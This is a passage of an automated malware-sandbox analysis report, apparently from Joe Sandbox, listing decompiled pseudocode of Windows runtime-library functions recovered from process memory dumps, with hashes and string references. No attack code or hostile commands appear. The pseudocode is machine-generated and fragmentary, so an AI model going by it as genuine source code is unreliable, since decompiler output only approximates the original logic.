              																				if(_t177 == 0) {
              																					goto L42;
              																				} else {
              																					_t130 = E04BFFD9B(_t177, 0, 4);
              																					__eflags = _t130;
              																					if(_t130 != 0) {
              																						goto L42;
              																					} else {
              																						_t68 = _t177 + 0x20;
              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
              																						__eflags =  *_t68;
              																						_t91 =  *(_t177 + 0x20);
              																						goto L74;
              																					}
              																				}
              																			}
              																			goto L35;
              																		} else {
              																			__eflags = _t141;
              																			if(_t141 != 0) {
              																				_t177 = E04BFFD22(_t177);
              																				__eflags = _t177;
              																				if(_t177 == 0) {
              																					L42:
              																					_t77 = 0xc0000001;
              																					goto L33;
              																				} else {
              																					_t130 = E04BFFD9B(_t177, 0, 4);
              																					__eflags = _t130;
              																					if(_t130 != 0) {
              																						goto L42;
              																					} else {
              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
              																						_t91 =  *(_t177 + 0x20);
              																						goto L26;
              																					}
              																				}
              																				goto L35;
              																			} else {
              																				L26:
              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
              																				__eflags = _t94;
              																				L27:
              																				 *(_t177 + 0x20) = _t94;
              																				__eflags = _t170 & 0x00008000;
              																				if((_t170 & 0x00008000) != 0) {
              																					_t95 = _a12;
              																					__eflags = _t95;
              																					if(_t95 != 0) {
              																						_t96 =  *_t95;
              																						__eflags = _t96;
              																						if(_t96 != 0) {
              																							 *((short*)(_t177 + 0x22)) = 0;
              																							_t40 = _t177 + 0x20;
              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
              																							__eflags =  *_t40;
              																						}
              																					}
              																				}
              																				goto L31;
              																			}
              																		}
              																	}
              																}
              															}
              														}
              													} else {
              														_t147 =  *( *[fs:0x18] + 0xfc0);
              														_t106 =  *(_t147 + 0x20);
              														__eflags = _t106 & 0x00000040;
              														if((_t106 & 0x00000040) != 0) {
              															_t147 = E04BFFD22(_t147);
              															__eflags = _t147;
              															if(_t147 == 0) {
              																L41:
              																_t130 = 0xc0000001;
              																L32:
              																_t77 = _t130;
              																goto L33;
              															} else {
              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
              																_t106 =  *(_t147 + 0x20);
              																goto L17;
              															}
              															goto L35;
              														} else {
              															L17:
              															_t108 = _t106 | 0x00000080;
              															__eflags = _t108;
              															 *(_t147 + 0x20) = _t108;
              															 *( *[fs:0x18] + 0xfc0) = _t147;
              															goto L18;
              														}
              													}
              												}
              											}
              											L33:
              										}
              									}
              								}
              							}
              						}
              						L35:
              						return _t77;
              					} else {
              						 *_t75 = 0x4cb7b80;
              						 *((intOrPtr*)(_t75 + 4)) = _t134;
              						 *_t134 = _t75;
              						 *0x4cb7b84 = _t75;
              						_t73 = E04BDEB70(_t134, 0x4cb7b60);
              						if( *0x4cb7b20 != 0) {
              							_t73 =  *( *[fs:0x30] + 0xc);
              							if( *((char*)(_t73 + 0x28)) == 0) {
              								_t73 = E04BDFF60( *0x4cb7b20);
              							}
              						}
              						goto L5;
              					}
              				}
              			}


              Strings
              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04C3BE0F
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
              • API String ID: 0-865735534
              • Opcode ID: 0d61ea505be969ad849e591af6ab7b3701f5a290a3dfdc40d10e20fde52aabeb
              • Instruction ID: 34fd94ffd8434226f0d212692fb83c6b5283b3714e6412f26ce945cc679b5f90
              • Opcode Fuzzy Hash: 0d61ea505be969ad849e591af6ab7b3701f5a290a3dfdc40d10e20fde52aabeb
              • Instruction Fuzzy Hash: E0A12731B006159FEB25DF68C8507BAB3A5EF48715F0445AAEA0ADB691FB30FD45CB80
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 63%
              			E04BC2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
              				signed char _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				signed int _v52;
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t55;
              				signed int _t57;
              				signed int _t58;
              				char* _t62;
              				signed char* _t63;
              				signed char* _t64;
              				signed int _t67;
              				signed int _t72;
              				signed int _t77;
              				signed int _t78;
              				signed int _t88;
              				intOrPtr _t89;
              				signed char _t93;
              				signed int _t97;
              				signed int _t98;
              				signed int _t102;
              				signed int _t103;
              				intOrPtr _t104;
              				signed int _t105;
              				signed int _t106;
              				signed char _t109;
              				signed int _t111;
              				void* _t116;
              
              				_t102 = __edi;
              				_t97 = __edx;
              				_v12 = _v12 & 0x00000000;
              				_t55 =  *[fs:0x18];
              				_t109 = __ecx;
              				_v8 = __edx;
              				_t86 = 0;
              				_v32 = _t55;
              				_v24 = 0;
              				_push(__edi);
              				if(__ecx == 0x4cb5350) {
              					_t86 = 1;
              					_v24 = 1;
              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
              				}
              				_t103 = _t102 | 0xffffffff;
              				if( *0x4cb7bc8 != 0) {
              					_push(0xc000004b);
              					_push(_t103);
              					E04C097C0();
              				}
              				if( *0x4cb79c4 != 0) {
              					_t57 = 0;
              				} else {
              					_t57 = 0x4cb79c8;
              				}
              				_v16 = _t57;
              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
              					_t93 = _t109;
              					L23();
              				}
              				_t58 =  *_t109;
              				if(_t58 == _t103) {
              					__eflags =  *(_t109 + 0x14) & 0x01000000;
              					_t58 = _t103;
              					if(__eflags == 0) {
              						_t93 = _t109;
              						E04BF1624(_t86, __eflags);
              						_t58 =  *_t109;
              					}
              				}
              				_v20 = _v20 & 0x00000000;
              				if(_t58 != _t103) {
              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
              				}
              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
              				_t88 = _v16;
              				_v28 = _t104;
              				L9:
              				while(1) {
              					if(E04BE7D50() != 0) {
              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
              					} else {
              						_t62 = 0x7ffe0382;
              					}
              					if( *_t62 != 0) {
              						_t63 =  *[fs:0x30];
              						__eflags = _t63[0x240] & 0x00000002;
              						if((_t63[0x240] & 0x00000002) != 0) {
              							_t93 = _t109;
              							E04C5FE87(_t93);
              						}
              					}
              					if(_t104 != 0xffffffff) {
              						_push(_t88);
              						_push(0);
              						_push(_t104);
              						_t64 = E04C09520();
              						goto L15;
              					} else {
              						while(1) {
              							_t97 =  &_v8;
              							_t64 = E04BFE18B(_t109 + 4, _t97, 4, _t88, 0);
              							if(_t64 == 0x102) {
              								break;
              							}
              							_t93 =  *(_t109 + 4);
              							_v8 = _t93;
              							if((_t93 & 0x00000002) != 0) {
              								continue;
              							}
              							L15:
              							if(_t64 == 0x102) {
              								break;
              							}
              							_t89 = _v24;
              							if(_t64 < 0) {
              								L04C1DF30(_t93, _t97, _t64);
              								_push(_t93);
              								_t98 = _t97 | 0xffffffff;
              								__eflags =  *0x4cb6901;
              								_push(_t109);
              								_v52 = _t98;
              								if( *0x4cb6901 != 0) {
              									_push(0);
              									_push(1);
              									_push(0);
              									_push(0x100003);
              									_push( &_v12);
              									_t72 = E04C09980();
              									__eflags = _t72;
              									if(_t72 < 0) {
              										_v12 = _t98 | 0xffffffff;
              									}
              								}
              								asm("lock cmpxchg [ecx], edx");
              								_t111 = 0;
              								__eflags = 0;
              								if(0 != 0) {
              									__eflags = _v12 - 0xffffffff;
              									if(_v12 != 0xffffffff) {
              										_push(_v12);
              										E04C095D0();
              									}
              								} else {
              									_t111 = _v12;
              								}
              								return _t111;
              							} else {
              								if(_t89 != 0) {
              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
              									_t77 = E04BE7D50();
              									__eflags = _t77;
              									if(_t77 == 0) {
              										_t64 = 0x7ffe0384;
              									} else {
              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
              									}
              									__eflags =  *_t64;
              									if( *_t64 != 0) {
              										_t64 =  *[fs:0x30];
              										__eflags = _t64[0x240] & 0x00000004;
              										if((_t64[0x240] & 0x00000004) != 0) {
              											_t78 = E04BE7D50();
              											__eflags = _t78;
              											if(_t78 == 0) {
              												_t64 = 0x7ffe0385;
              											} else {
              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
              											}
              											__eflags =  *_t64 & 0x00000020;
              											if(( *_t64 & 0x00000020) != 0) {
              												_t64 = E04C47016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
              											}
              										}
              									}
              								}
              								return _t64;
              							}
              						}
              						_t97 = _t88;
              						_t93 = _t109;
              						E04C5FDDA(_t97, _v12);
              						_t105 =  *_t109;
              						_t67 = _v12 + 1;
              						_v12 = _t67;
              						__eflags = _t105 - 0xffffffff;
              						if(_t105 == 0xffffffff) {
              							_t106 = 0;
              							__eflags = 0;
              						} else {
              							_t106 =  *(_t105 + 0x14);
              						}
              						__eflags = _t67 - 2;
              						if(_t67 > 2) {
              							__eflags = _t109 - 0x4cb5350;
              							if(_t109 != 0x4cb5350) {
              								__eflags = _t106 - _v20;
              								if(__eflags == 0) {
              									_t93 = _t109;
              									E04C5FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
              								}
              							}
              						}
              						_push("RTL: Re-Waiting\n");
              						_push(0);
              						_push(0x65);
              						_v20 = _t106;
              						E04C55720();
              						_t104 = _v28;
              						_t116 = _t116 + 0xc;
              						continue;
              					}
              				}
              			}


              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Re-Waiting
              • API String ID: 0-316354757
              • Opcode ID: 51cc6620afb8eed454e975985887e1197aec5d3cff1e2ab98f8b1decf4781b2a
              • Instruction ID: 6c9bba922115bdc7031424d6a62f52f86186c7b0b51ee15eca8a2a6f16179de1
              • Opcode Fuzzy Hash: 51cc6620afb8eed454e975985887e1197aec5d3cff1e2ab98f8b1decf4781b2a
              • Instruction Fuzzy Hash: 02613670F00205EBEB25DF68C880B7E77A6EB45714F1406EED851A72E0DB34BA41A791
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E04C90EA5(void* __ecx, void* __edx) {
              				signed int _v20;
              				char _v24;
              				intOrPtr _v28;
              				unsigned int _v32;
              				signed int _v36;
              				intOrPtr _v40;
              				char _v44;
              				intOrPtr _v64;
              				void* __ebx;
              				void* __edi;
              				signed int _t58;
              				unsigned int _t60;
              				intOrPtr _t62;
              				char* _t67;
              				char* _t69;
              				void* _t80;
              				void* _t83;
              				intOrPtr _t93;
              				intOrPtr _t115;
              				char _t117;
              				void* _t120;
              
              				_t83 = __edx;
              				_t117 = 0;
              				_t120 = __ecx;
              				_v44 = 0;
              				if(E04C8FF69(__ecx,  &_v44,  &_v32) < 0) {
              					L24:
              					_t109 = _v44;
              					if(_v44 != 0) {
              						E04C91074(_t83, _t120, _t109, _t117, _t117);
              					}
              					L26:
              					return _t117;
              				}
              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
              				_t5 = _t83 + 1; // 0x1
              				_v36 = _t5 << 0xc;
              				_v40 = _t93;
              				_t58 =  *(_t93 + 0xc) & 0x40000000;
              				asm("sbb ebx, ebx");
              				_t83 = ( ~_t58 & 0x0000003c) + 4;
              				if(_t58 != 0) {
              					_push(0);
              					_push(0x14);
              					_push( &_v24);
              					_push(3);
              					_push(_t93);
              					_push(0xffffffff);
              					_t80 = E04C09730();
              					_t115 = _v64;
              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
              						_push(_t93);
              						E04C8A80D(_t115, 1, _v20, _t117);
              						_t83 = 4;
              					}
              				}
              				if(E04C8A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
              					goto L24;
              				}
              				_t60 = _v32;
              				_t97 = (_t60 != 0x100000) + 1;
              				_t83 = (_v44 -  *0x4cb8b04 >> 0x14) + (_v44 -  *0x4cb8b04 >> 0x14);
              				_v28 = (_t60 != 0x100000) + 1;
              				_t62 = _t83 + (_t60 >> 0x14) * 2;
              				_v40 = _t62;
              				if(_t83 >= _t62) {
              					L10:
              					asm("lock xadd [eax], ecx");
              					asm("lock xadd [eax], ecx");
              					if(E04BE7D50() == 0) {
              						_t67 = 0x7ffe0380;
              					} else {
              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              					}
              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
              						E04C8138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
              					}
              					if(E04BE7D50() == 0) {
              						_t69 = 0x7ffe0388;
              					} else {
              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              					}
              					if( *_t69 != 0) {
              						E04C7FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
              					}
              					if(( *0x4cb8724 & 0x00000008) != 0) {
              						E04C852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
              					}
              					_t117 = _v44;
              					goto L26;
              				}
              				while(E04C915B5(0x4cb8ae4, _t83, _t97, _t97) >= 0) {
              					_t97 = _v28;
              					_t83 = _t83 + 2;
              					if(_t83 < _v40) {
              						continue;
              					}
              					goto L10;
              				}
              				goto L24;
              			}


              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: `
              • API String ID: 0-2679148245
              • Opcode ID: f637a9d1d2272e14d0fdbee03b54a049f9d5378a24bb8ddc77d8b02002c76ffa
              • Instruction ID: a8c9ede28365ccb0ffbe8f731378d988ebae7ff36d1f867e1a24805ce27dca8c
              • Opcode Fuzzy Hash: f637a9d1d2272e14d0fdbee03b54a049f9d5378a24bb8ddc77d8b02002c76ffa
              • Instruction Fuzzy Hash: AB519E71204342AFE724DF29D889B1BB7E6EBC4708F08492DF99697290DA71FD05C761
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E04BFF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				char* _v20;
              				intOrPtr _v24;
              				char _v28;
              				intOrPtr _v32;
              				char _v36;
              				char _v44;
              				char _v52;
              				intOrPtr _v56;
              				char _v60;
              				intOrPtr _v72;
              				void* _t51;
              				void* _t58;
              				signed short _t82;
              				short _t84;
              				signed int _t91;
              				signed int _t100;
              				signed short* _t103;
              				void* _t108;
              				intOrPtr* _t109;
              
              				_t103 = __ecx;
              				_t82 = __edx;
              				_t51 = E04BE4120(0, __ecx, 0,  &_v52, 0, 0, 0);
              				if(_t51 >= 0) {
              					_push(0x21);
              					_push(3);
              					_v56 =  *0x7ffe02dc;
              					_v20 =  &_v52;
              					_push( &_v44);
              					_v28 = 0x18;
              					_push( &_v28);
              					_push(0x100020);
              					_v24 = 0;
              					_push( &_v60);
              					_v16 = 0x40;
              					_v12 = 0;
              					_v8 = 0;
              					_t58 = E04C09830();
              					_t87 =  *[fs:0x30];
              					_t108 = _t58;
              					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
              					if(_t108 < 0) {
              						L11:
              						_t51 = _t108;
              					} else {
              						_push(4);
              						_push(8);
              						_push( &_v36);
              						_push( &_v44);
              						_push(_v60);
              						_t108 = E04C09990();
              						if(_t108 < 0) {
              							L10:
              							_push(_v60);
              							E04C095D0();
              							goto L11;
              						} else {
              							_t18 = _t82 + 0x18; // 0x102bc81a
              							_t109 = L04BE4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
              							if(_t109 == 0) {
              								_t108 = 0xc0000017;
              								goto L10;
              							} else {
              								_t21 = _t109 + 0x18; // 0x18
              								 *((intOrPtr*)(_t109 + 4)) = _v60;
              								 *_t109 = 1;
              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
              								 *(_t109 + 0xe) = _t82;
              								 *((intOrPtr*)(_t109 + 8)) = _v56;
              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
              								_t29 =  &(_t103[2]); // 0x2003102b
              								E04C0F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
              								 *((short*)(_t109 + 0xc)) =  *_t103;
              								_t91 =  *_t103 & 0x0000ffff;
              								_t34 =  &(_t103[2]); // 0x2003102b
              								_t100 = _t91 & 0xfffffffe;
              								_t84 = 0x5c;
              								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
              										_push(_v60);
              										E04C095D0();
              										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
              										_t51 = 0xc0000106;
              									} else {
              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
              										goto L5;
              									}
              								} else {
              									L5:
              									 *_a4 = _t109;
              									_t51 = 0;
              								}
              							}
              						}
              					}
              				}
              				return _t51;
              			}


























              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: @
              • API String ID: 0-2766056989
              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
              • Instruction ID: ad5bbf288b8c56d52779855763f0f34f7c132b311021085c720301f74416058c
              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
              • Instruction Fuzzy Hash: 42517D716047109FD320DF19C840A6BBBF9FF88714F008A2EFA9597690E7B4E954DB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 75%
              			E04C43540(intOrPtr _a4) {
              				signed int _v12;
              				intOrPtr _v88;
              				intOrPtr _v92;
              				char _v96;
              				char _v352;
              				char _v1072;
              				intOrPtr _v1140;
              				intOrPtr _v1148;
              				char _v1152;
              				char _v1156;
              				char _v1160;
              				char _v1164;
              				char _v1168;
              				char* _v1172;
              				short _v1174;
              				char _v1176;
              				char _v1180;
              				char _v1192;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				short _t41;
              				short _t42;
              				intOrPtr _t80;
              				intOrPtr _t81;
              				signed int _t82;
              				void* _t83;
              
              				_v12 =  *0x4cbd360 ^ _t82;
              				_t41 = 0x14;
              				_v1176 = _t41;
              				_t42 = 0x16;
              				_v1174 = _t42;
              				_v1164 = 0x100;
              				_v1172 = L"BinaryHash";
              				_t81 = E04C00BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
              				if(_t81 < 0) {
              					L11:
              					_t75 = _t81;
              					E04C43706(0, _t81, _t79, _t80);
              					L12:
              					if(_a4 != 0xc000047f) {
              						E04C0FA60( &_v1152, 0, 0x50);
              						_v1152 = 0x60c201e;
              						_v1148 = 1;
              						_v1140 = E04C43540;
              						E04C0FA60( &_v1072, 0, 0x2cc);
              						_push( &_v1072);
              						E04C1DDD0( &_v1072, _t75, _t79, _t80, _t81);
              						E04C50C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
              						_push(_v1152);
              						_push(0xffffffff);
              						E04C097C0();
              					}
              					return E04C0B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
              				}
              				_t79 =  &_v352;
              				_t81 = E04C43971(0, _a4,  &_v352,  &_v1156);
              				if(_t81 < 0) {
              					goto L11;
              				}
              				_t75 = _v1156;
              				_t79 =  &_v1160;
              				_t81 = E04C43884(_v1156,  &_v1160,  &_v1168);
              				if(_t81 >= 0) {
              					_t80 = _v1160;
              					E04C0FA60( &_v96, 0, 0x50);
              					_t83 = _t83 + 0xc;
              					_push( &_v1180);
              					_push(0x50);
              					_push( &_v96);
              					_push(2);
              					_push( &_v1176);
              					_push(_v1156);
              					_t81 = E04C09650();
              					if(_t81 >= 0) {
              						if(_v92 != 3 || _v88 == 0) {
              							_t81 = 0xc000090b;
              						}
              						if(_t81 >= 0) {
              							_t75 = _a4;
              							_t79 =  &_v352;
              							E04C43787(_a4,  &_v352, _t80);
              						}
              					}
              					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
              				}
              				_push(_v1156);
              				E04C095D0();
              				if(_t81 >= 0) {
              					goto L12;
              				} else {
              					goto L11;
              				}
              			}
































              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: BinaryHash
              • API String ID: 2994545307-2202222882
              • Opcode ID: fb1f895907102116b8f01731a961a924091e15468ab283bb6b7722bf8b94636d
              • Instruction ID: d1640693ae82dceb0b93ac34888b690e9fdcc39b910b91100b302c8b272e6245
              • Opcode Fuzzy Hash: fb1f895907102116b8f01731a961a924091e15468ab283bb6b7722bf8b94636d
              • Instruction Fuzzy Hash: 594167F1D0056D9FEB21DA50CD84FDEB77DAB84718F0045A5EA09A7290DB30AE88DF94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E04C43884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
              				char _v8;
              				intOrPtr _v12;
              				intOrPtr* _v16;
              				char* _v20;
              				short _v22;
              				char _v24;
              				intOrPtr _t38;
              				short _t40;
              				short _t41;
              				void* _t44;
              				intOrPtr _t47;
              				void* _t48;
              
              				_v16 = __edx;
              				_t40 = 0x14;
              				_v24 = _t40;
              				_t41 = 0x16;
              				_v22 = _t41;
              				_t38 = 0;
              				_v12 = __ecx;
              				_push( &_v8);
              				_push(0);
              				_push(0);
              				_push(2);
              				_t43 =  &_v24;
              				_v20 = L"BinaryName";
              				_push( &_v24);
              				_push(__ecx);
              				_t47 = 0;
              				_t48 = E04C09650();
              				if(_t48 >= 0) {
              					_t48 = 0xc000090b;
              				}
              				if(_t48 != 0xc0000023) {
              					_t44 = 0;
              					L13:
              					if(_t48 < 0) {
              						L16:
              						if(_t47 != 0) {
              							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
              						}
              						L18:
              						return _t48;
              					}
              					 *_v16 = _t38;
              					 *_a4 = _t47;
              					goto L18;
              				}
              				_t47 = L04BE4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
              				if(_t47 != 0) {
              					_push( &_v8);
              					_push(_v8);
              					_push(_t47);
              					_push(2);
              					_push( &_v24);
              					_push(_v12);
              					_t48 = E04C09650();
              					if(_t48 < 0) {
              						_t44 = 0;
              						goto L16;
              					}
              					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
              						_t48 = 0xc000090b;
              					}
              					_t44 = 0;
              					if(_t48 < 0) {
              						goto L16;
              					} else {
              						_t17 = _t47 + 0xc; // 0xc
              						_t38 = _t17;
              						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
              							_t48 = 0xc000090b;
              						}
              						goto L13;
              					}
              				}
              				_t48 = _t48 + 0xfffffff4;
              				goto L18;
              			}
















              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: BinaryName
              • API String ID: 2994545307-215506332
              • Opcode ID: cef61114dce000fb6abeb56b58d208f7307470c345782a18f68e689d8b6c6af6
              • Instruction ID: 795c1e1290ff4bfbd25c4756f48b3646e3640db249d182456fdbc633e8c32c97
              • Opcode Fuzzy Hash: cef61114dce000fb6abeb56b58d208f7307470c345782a18f68e689d8b6c6af6
              • Instruction Fuzzy Hash: EE31F472A00549BFEB25DA99CA45E7BB776EBD0720F014169AC04A76A0D730BE40C7A0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 33%
              			E04BFD294(void* __ecx, char __edx, void* __eflags) {
              				signed int _v8;
              				char _v52;
              				signed int _v56;
              				signed int _v60;
              				intOrPtr _v64;
              				char* _v68;
              				intOrPtr _v72;
              				char _v76;
              				signed int _v84;
              				intOrPtr _v88;
              				char _v92;
              				intOrPtr _v96;
              				intOrPtr _v100;
              				char _v104;
              				char _v105;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t35;
              				char _t38;
              				signed int _t40;
              				signed int _t44;
              				signed int _t52;
              				void* _t53;
              				void* _t55;
              				void* _t61;
              				intOrPtr _t62;
              				void* _t64;
              				signed int _t65;
              				signed int _t66;
              
              				_t68 = (_t66 & 0xfffffff8) - 0x6c;
              				_v8 =  *0x4cbd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
              				_v105 = __edx;
              				_push( &_v92);
              				_t52 = 0;
              				_push(0);
              				_push(0);
              				_push( &_v104);
              				_push(0);
              				_t59 = __ecx;
              				_t55 = 2;
              				if(E04BE4120(_t55, __ecx) < 0) {
              					_t35 = 0;
              					L8:
              					_pop(_t61);
              					_pop(_t64);
              					_pop(_t53);
              					return E04C0B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
              				}
              				_v96 = _v100;
              				_t38 = _v92;
              				if(_t38 != 0) {
              					_v104 = _t38;
              					_v100 = _v88;
              					_t40 = _v84;
              				} else {
              					_t40 = 0;
              				}
              				_v72 = _t40;
              				_v68 =  &_v104;
              				_push( &_v52);
              				_v76 = 0x18;
              				_push( &_v76);
              				_v64 = 0x40;
              				_v60 = _t52;
              				_v56 = _t52;
              				_t44 = E04C098D0();
              				_t62 = _v88;
              				_t65 = _t44;
              				if(_t62 != 0) {
              					asm("lock xadd [edi], eax");
              					if((_t44 | 0xffffffff) != 0) {
              						goto L4;
              					}
              					_push( *((intOrPtr*)(_t62 + 4)));
              					E04C095D0();
              					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
              					goto L4;
              				} else {
              					L4:
              					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
              					if(_t65 >= 0) {
              						_t52 = 1;
              					} else {
              						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
              							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
              						}
              					}
              					_t35 = _t52;
              					goto L8;
              				}
              			}


































              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: @
              • API String ID: 0-2766056989
